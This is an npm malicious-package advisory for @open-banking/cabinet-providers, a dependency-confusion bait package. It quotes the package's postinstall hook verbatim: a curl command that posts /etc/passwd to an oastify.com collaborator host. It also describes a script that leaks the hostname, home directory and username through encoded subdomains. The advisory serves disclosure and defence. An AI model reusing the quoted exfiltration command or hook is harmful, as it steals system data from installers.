npm · Malicious package advisory
Malware@open-banking/cabinet-providers
MAL-2026-5392
Malicious code in @open-banking/cabinet-providers (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280) @open-banking/cabinet-providers@999.9.5 is a dependency-confusion bait package (anomalously high version under a generic scope) that exfiltrates installer data via its postinstall lifecycle. package.json declares `"postinstall": "node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com"`, which posts the contents of `/etc/passwd` (prefixed by the installer's hostname as a subdomain) to a Burp Collaborator (OAST) endpoint. The bundled `scripts/scream3gg.js` hex-encodes `os.hostname()`, `os.homedir()`, and `os.userInfo().username`, splits the result into 50-character chunks joined by `.`, and fetches `http://<chunks>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com` over plain HTTP — leaking host identity through DNS-style subdomain encoding. Both behaviors fire automatically on `npm install` with no user consent.
Compromised versions (2)
- 999.9.2
- 999.9.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.